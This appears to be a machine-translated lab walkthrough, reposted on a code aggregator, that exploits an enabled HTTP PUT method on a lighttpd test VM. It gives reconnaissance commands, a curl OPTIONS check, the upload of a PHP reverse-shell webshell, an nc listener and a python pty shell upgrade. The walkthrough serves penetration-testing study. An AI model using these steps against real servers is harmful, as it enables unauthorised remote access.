PUT middleware upload vulnerability

Others 2021-03-07 14:31:56 views: null

First introduce the principle of PUT upload vulnerability

Our common middleware are apache, tomcat, IIS, weblogic (actually web container), these middleware can be set to support HTTP methods. Each HTTP method has its corresponding function, in these methods, PUT can directly upload files from the client to the server. If the middleware opens the PUT method in HTTP, the malicious attacker can directly upload the webshell to the corresponding server.

Target machine construction

Link: https://pan.baidu.com/s/1l_LILZgjUZ6ASrFQq9X22A
Extraction code: lsq0

Vulnerability recurrence

  1. Use netdiscover to discover surviving hosts
netdiscover -i eth0

Insert picture description here

  1. Use nmap to detect services and other information on the target aircraft
nmap -sV 192.168.75.158
  • Found that the target uses lighttpd middleware
    Insert picture description here
  1. Use dirb to conduct further information mining on the website
dirb http://192.168.75.158
  • Found a directory of test
    Insert picture description here
  • Log in to this directory and find that there is no available information
    Insert picture description here
  1. Use OWASP_ZAP to scan the test website and find that it has a put vulnerability
    Insert picture description here
  • Then use the curl command to send a data message to check this vulnerability
  • Note: If the scanner cannot see the vulnerability in reality, we must also have this injection idea
curl -v -X OPTIONS http://192.168.75.158/test

Found that PUT is allowed to upload files, and preliminary verification that there is a PUT upload vulnerability
Insert picture description here

  1. So we can upload a webshell to this directory
cp /usr/share/webshells/php/php-reverse-shell.php /root/Desktop/shell.php
  • Edit the content of shell.php, I set the port to be monitored here to 443
    Insert picture description here
  1. Use the poster plug-in of firefox to upload webshell, the old version of firefox only has the poster plug-in
  • Fill in the URL http://target machine address/test/ to save the file name, here is rshell.php
  • Select the location of shell.php
  • Click PUT to upload
    Insert picture description here
  1. After the upload is successful, open a 443 listening port in kali
nc -nlvp 443
  • Click rshell.php, the rebound gave us a shell
  • Enter python -c "import pty;pty.spawn('/bin/bash')" to optimize the terminal
  • Successfully penetrated the system
    Insert picture description here

Summary: In actual combat, PUT upload loopholes are a very common loophole, we must have such a thinking all the time.

Guess you like

Origin blog.csdn.net/weixin_45007073/article/details/112574462
Recommended
The number of MaxKB GitHub Stars, an open source knowledge base question and answer system based on large language models, exceeded 5,000!
Ranking
Getting the basic concepts of ROS + catkin Profile
Spring Learning (2) --- Assembling Beans in the IoC Container
js to get the src attribute of the image regularly
STM32 is based on CubeIDE and HAL library basics entry study notes: Bluetooth WIFI STM32 connects to Alibaba Cloud
Short video learning - 3, pandas simple use of pivot_table
Print directory of project configuration log, output log
Understand the difference between vi and vim in Linux in 3 minutes
1 + x certificate Web front-end development HTML5 special exercises
mangodb save and insert the difference
7-1 Family tree processing (50 points) (binary tree solution)
Daily
More
2024-05-13(8)
2024-05-12(28)
2024-05-11(32)
2024-05-10(34)
2024-05-09(32)
2024-05-08(18)
2024-05-07(34)
2024-05-06(6)
2024-05-05(0)
2024-05-04(18)

Code World

© 2018 codetd.com